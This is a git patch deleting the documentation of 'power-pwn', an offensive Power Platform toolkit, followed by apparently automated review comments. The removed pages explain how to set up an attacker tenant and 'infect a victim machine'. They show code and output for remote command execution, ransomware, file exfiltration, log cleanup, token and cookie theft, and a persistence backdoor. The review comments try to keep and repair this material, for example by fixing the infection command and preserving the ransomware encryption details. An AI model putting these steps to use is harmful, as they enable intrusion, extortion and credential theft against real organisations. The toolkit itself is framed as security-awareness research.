From b6e2348e3ff7eb0ef6cd611228ab327d9c60d8d6 Mon Sep 17 00:00:00 2001 From: mbrg <11074433+mbrg@users.noreply.github.com> Date: Thu, 27 Jul 2023 14:40:26 +0300 Subject: [PATCH] remove docs --- docs/machinepwn/cloud_setup.md | 53 --------------------------- docs/machinepwn/infect_machine.md | 7 ---- docs/machinepwn/machine_pwn.md | 59 ------------------------------- docs/machinepwn/setup.txt | 27 -------------- docs/machinepwn/troubleshoot.md | 8 ----- docs/powerdoor/readme.md | 36 ------------------- 6 files changed, 190 deletions(-) delete mode 100644 docs/machinepwn/cloud_setup.md delete mode 100644 docs/machinepwn/infect_machine.md delete mode 100644 docs/machinepwn/machine_pwn.md delete mode 100644 docs/machinepwn/setup.txt delete mode 100644 docs/machinepwn/troubleshoot.md delete mode 100644 docs/powerdoor/readme.md diff --git a/docs/machinepwn/cloud_setup.md b/docs/machinepwn/cloud_setup.md deleted file mode 100644 index 2c602f6..0000000 --- a/docs/machinepwn/cloud_setup.md +++ /dev/null 
@@ -1,53 +0,0 @@ -# How to set up your power-pwn cloud account - -### Set up a malicious Microsoft tenant - -1. Set up your free Microsoft tenant by following [Microsoft guidelines](https://docs.microsoft.com/en-us/azure/active-directory/verifiable-credentials/how-to-create-a-free-developer-account) - - ![Pwntoso tenant](assets/pwntoso.png) - -2. Create a malicious user account and assign it a _Power platform administrator_ role. The admin role isn't necessary, it's just convenient. - - ![Power platform administrator role](assets/power_platform_admin.png) - -3. On a private browser tab - - 1. Go to https://flow.microsoft.com and log in with the malicious user. Follow through the sign-in process to initiate a Power Automate trial license. - - 2. Follow the same process with https://make.powerapps.com to initiate a Power Apps trial license. - -4. Create a Service Principal by following [Microsoft guidelines](https://docs.microsoft.com/en-us/power-automate/desktop-flows/machines-silent-registration#using-a-service-principal-account) and note the _tenantId_, _applicationId_ and _secret_. - -### Infect a test victim machines - -1. Infect a test machine by following the [How to infect a victim machine guide](infect_machine.md). - -2. Verify that the machine has been onboarded - - 1. Log into https://flow.microsoft.com as the malicious user - - 2. Click Go to _Monitor_ and then _Machines_ and verify that the test victim machine is there - - ![Victim machines](assets/victim_machines.png) - -### Upload pwntoso to your Power Automate cloud environment - -1. Log into https://flow.microsoft.com with the malicious user. - -2. Go to _Solutions_ and click _Import solution_ - - ![Import pwntoso solution](assets/import_solution.png) - -3. Zip the content of [pwntoso_1_0_0_1](../src/malicious_msft/solution/pwntoso_1_0_0_1) and select it when asked to provide a solution file. Follow the guided process to completion. - - 1. 
When asked to provide a connection, following the guided process to create a new machine connection. Use the test victim machine credentials. - -4. Go to _My flows_ and search for _Endpoint_ - - ![Endpoint flow](assets/endpoint_flow.png) - - Click on _Edit_ and then on _When a HTTP request is received_ and copy the URL under _HTTP POST URL_ - - ![HTTP Post URL](assets/post_url.png) - -5. Note the _HTTP Post URL_ for use with the Python module. \ No newline at end of file diff --git a/docs/machinepwn/infect_machine.md b/docs/machinepwn/infect_machine.md deleted file mode 100644 index 44b2c1b..0000000 --- a/docs/machinepwn/infect_machine.md +++ /dev/null @@ -1,7 +0,0 @@ -# How to infect a victim machine - -To register a victim machine, recall the __, __ and __ you got from following the [cloud setup guide](cloud_setup.md) and run the following command - - `echo | C:\Program Files (x86)\Power Automate Desktop\PAD.MachineRegistration.Silent.exe -register -applicationid -tenantid -clientsecret -force` - -That's it! For troubleshooting, refer to [Microsoft Docs](https://docs.microsoft.com/en-us/power-automate/desktop-flows/machines-silent-registration#silently-register-a-new-machine). diff --git a/docs/machinepwn/machine_pwn.md b/docs/machinepwn/machine_pwn.md deleted file mode 100644 index d59b5e9..0000000 --- a/docs/machinepwn/machine_pwn.md +++ /dev/null 
@@ -1,59 +0,0 @@ -## Usage - -```python -from powerpwn.machinepwn.machine_pwn import MachinePwn - -POST_URL = "" -pp = MachinePwn(post_url=POST_URL) - -### code execution - -# python2 -pp.exec_py2("print('hello world')").cmd_code_execution -# CodeExecOutputs(ScriptOutput='\ufeffhello world\r\n', ScriptError='') - -# python2 bad syntax -pp.exec_py2("bad syntax").cmd_code_execution -# CodeExecOutputs(ScriptOutput='', ScriptError=' File "", line 1\r\n bad syntax\r\n ^\r\nSyntaxError: unexpected token \'syntax\'') - -# powershell -pp.exec_ps("Write-Host \"hello word\"").cmd_code_execution - -# commandline -pp.exec_cmd("echo \"hello word\"").cmd_code_execution -# CodeExecOutputs(ScriptOutput='Microsoft Windows [Version 10.0.22000.795]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files (x86)\\Power Automate Desktop>echo "hello word"\r\n"hello word"\r\n\r\n', ScriptError='') - -### ransomware - -pp.ransomware(crawl_depth=2, dirs_to_init_crawl=["C:\\Users\\alexg\\Documents\\mystuff", "D:\\shh"], encryption_key="8d1d4245").cmd_ransomware -# Ransomware=RansomwareOutputs(FilesFound=9, FilesAccessed=9, FilesProcessed=9, Errors='') - -### exfiltration - -pp.exfil(target="C:\\Users\\alexg\\Downloads\\takeit.txt").cmd_exfiltration -# ExfiltrationOutputs(Success=True, FileContents='asd') -pp.exfil(target="C:\\Users\\alexg\\Downloads\\dontexist.txt").cmd_exfiltration -# ExfiltrationOutputs(Success=False, FileContents='') - -### cleanup - -pp.cleanup().cmd_cleanup -# CleanupOutputs(FilesFound=179, LogFilesDeleted=178) - -### steal_power_automate_token - -pp.steal_power_automate_token().cmd_steal_power_automate_token -# StealPowerAutomateTokenOutputs(Token='ey...') - -### steal_cookie -pp.steal_cookie("https://www.google.com").cmd_steal_cookie -# StealCookieOutputs(Cookie='1P_JAR=2022-07-16-13; OGPC=19027681-1:') -``` - -## How To - -[How to set up your Power Pwn cloud environment](cloud_setup.md) - -[How to infect a victim machine](infect_machine.md) - -[How 
to troubleshoot execution errors](infect_machine.md) diff --git a/docs/machinepwn/setup.txt b/docs/machinepwn/setup.txt deleted file mode 100644 index b19f69a..0000000 --- a/docs/machinepwn/setup.txt +++ /dev/null @@ -1,27 +0,0 @@ -Create a new AAD tenant -Create a new user on that tenant and make them global admin -Turn off security default -Get an E3 license trial -Got to Power Automate -> Monitor > Machine, and set up a new Dataverse -Go to Desktop flow runs -> start trial - -Win 11 ent -Power Automate Desktop was already there. Did need an update. -Sign in w/ attacker creds -Machine-runtime app is not installed. So you can only build things by default, not run them remotely. Actually, cannot even run them. -Need to create an env per victim otherwise they see each other. -Reuse session (on cloud) - -https://powerautomate.microsoft.com/en-us/blog/use-power-automate-self-assisted-premium-trials-to-run-both-attended-and-unattended-rpa/ -two trials -assign to user and to env - -unicode -AES -padding PKCS7 -key size 256b -salt / init vector -https://docs.microsoft.com/en-us/power-automate/desktop-flows/actions-reference/cryptography#encryptfromfileaction - -prevent cleanup -https://docs.microsoft.com/en-us/power-automate/desktop-flows/governance#configure-power-automate-for-desktop-to-prevent-cleaning-up-of-run-files \ No newline at end of file diff --git a/docs/machinepwn/troubleshoot.md b/docs/machinepwn/troubleshoot.md deleted file mode 100644 index 290ff25..0000000 --- a/docs/machinepwn/troubleshoot.md +++ /dev/null @@ -1,8 +0,0 @@ -# How to troubleshoot execution errors - -## SessionExistsForTheUserWhenUnattended - -Got `success=False` with `code=SessionExistsForTheUserWhenUnattended` in `unattendedError`? - -Got to _Machines_ -> locate the machine -> three vertical dots -> _Edit details_ -> _Reuse sessions for unattended runs_. -See [reuse sessions for unattended runs](https://go.microsoft.com/fwlink/?linkid=2187511) 
diff --git a/docs/powerdoor/readme.md b/docs/powerdoor/readme.md deleted file mode 100644 index 4a17289..0000000 --- a/docs/powerdoor/readme.md +++ /dev/null @@ -1,36 +0,0 @@ -# Backdoor Flow - -[![stars](https://img.shields.io/github/stars/mbrg?icon=github&style=social)](https://github.com/mbrg) -[![twitter](https://img.shields.io/twitter/follow/mbrg0?icon=twitter&style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=mbrg0) -[![email me](https://img.shields.io/badge/michael.bargury-owasp.org-red?logo=Gmail)](mailto:michael.bargury@owasp.org) - -Backdoor Flow is a demo showing how to maintain persistency on Power Platform by installing an automation factory that creates, executes and deletes arbitrary commands. - -Power Pwn - -Disclaimer: these materials are presented from an attacker’s perspective with the goal of raising awareness to the risks of underestimating the security impact of No Code/Low Code. No Code/Low Code is awesome. - -## Usage -**As a python package** - -```python -from powerpwn.powerdoor.backdoor_flow import BackdoorFlow -from powerpwn.powerdoor.samples.forward_email_backdoor_flow import SAMPLE_FLOW -POST_URL = "" -factory = BackdoorFlow(post_url=POST_URL) - -flow = factory.create_flow( - environment_id=SAMPLE_FLOW["environment"], - flow_display_name=SAMPLE_FLOW["flowDisplayName"], - flow_definition=SAMPLE_FLOW["flowDefinition"], - flow_state=SAMPLE_FLOW["flowState"], - connection_references=EXAMPLE["connectionReferences"] -) - -factory.delete_flow(environment_id=SAMPLE_FLOW["environment"], flow_id=flow["name"]) -``` - -**From powerpwn cli** -* Run `powerpwn exec --help` to get all available commands. -* To create flow run `powerpwn exec create-flow -e {environment-id} -webhook-url {url to installed factory} -i {full path to input}` - * You can find an example to input file in samples/sample_backdoor_flow_cli_input.json
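Review bot: the commit message says only "remove docs" and nothing replaces docs/machinepwn/cloud_setup.md, which is the sole description of the setup sequence the rest of the tool depends on (a tenant with a Power platform administrator user, Power Automate and Power Apps trial licences, a service principal whose tenantId, applicationId and secret the registration step needs, import of the pwntoso_1_0_0_1 solution, and the HTTP POST URL of the Endpoint flow that the Python module takes as post_url). Either say in the commit message where this material now lives or keep a pointer in the top-level README; otherwise a user of MachinePwn(post_url=...) has no documented way to obtain that URL. The removed page also referenced `../src/malicious_msft/solution/pwntoso_1_0_0_1` and a set of `assets/*.png` images; check that those assets are removed in the same change or are still referenced from somewhere, so the repository is not left with orphaned files.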
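Review bot: the registration command in the removed docs/machinepwn/infect_machine.md had already lost its placeholders before deletion: `recall the __, __ and __` and `-register -applicationid -tenantid -clientsecret -force` carry no values, which looks like angle-bracket placeholders swallowed by the markdown renderer. If that breakage is the reason for dropping the page, the fix is to restore the placeholders inside backticks (for example `-applicationid <applicationId> -tenantid <tenantId> -clientsecret <secret>`) rather than delete the only documentation of the silent-registration step. Note also that the unquoted `C:\Program Files (x86)\Power Automate Desktop\PAD.MachineRegistration.Silent.exe` path will not run as written in cmd.exe because of the spaces, so the command needs quoting before it goes back in anywhere.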
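Review bot: removing docs/machinepwn/machine_pwn.md is justified on content grounds alone, since the usage sample embeds output captured from a real host (`C:\\Users\\alexg\\...` paths, `Microsoft Windows [Version 10.0.22000.795]`) and a browser cookie value (`1P_JAR=2022-07-16-13; OGPC=19027681-1:`); say so in the commit message, and be aware that deleting the file does not scrub these values from history. If the usage section is re-added elsewhere, replace the captured outputs with placeholders and fix the last link, which labels itself "How to troubleshoot execution errors" but points at infect_machine.md instead of troubleshoot.md.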
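Review bot: docs/machinepwn/setup.txt is scratch notes, but it is the only place the ransomware module's encryption parameters are written down (unicode, AES, PKCS7 padding, 256-bit key, salt / init vector, with a link to the Power Automate Desktop EncryptFromFile action reference), together with two operational prerequisites that none of the other removed pages mention: one environment per victim so the machines do not see each other, and the governance setting that stops Power Automate Desktop from cleaning up run files. Before deleting, move those lines into a docstring or the README; a reader who meets `ransomware(..., encryption_key="8d1d4245")` in the usage sample otherwise has no way to know how that 8-character key relates to the 256-bit AES key, salt and IV these notes describe.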
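Review bot: docs/machinepwn/troubleshoot.md is the only documentation of the `SessionExistsForTheUserWhenUnattended` failure (`success=False` with that code in `unattendedError`) and of its fix (Machines, locate the machine, three vertical dots, Edit details, Reuse sessions for unattended runs); it is short and self-contained, so fold it into a Troubleshooting section of the README rather than drop it. While moving it, fix the typo "Got to" (should be "Go to") and consider replacing the go.microsoft.com fwlink with the direct docs URL so the reference stays readable in plain text.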
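Review bot: the Python sample removed from docs/powerdoor/readme.md was broken before deletion: `connection_references=EXAMPLE["connectionReferences"]` uses a name that is never imported or defined, while every other argument is read from `SAMPLE_FLOW`; if the sample is reinstated anywhere it should read `connection_references=SAMPLE_FLOW["connectionReferences"]`, assuming the sample dict carries that key. The CLI section has the same relocation problem: `powerpwn exec create-flow -e {environment-id} -webhook-url {url to installed factory} -i {full path to input}` and the pointer to `samples/sample_backdoor_flow_cli_input.json` are the only usage notes for the backdoor-flow factory, and the single-dash long option `-webhook-url` should be checked against the actual argument parser before it is copied back in.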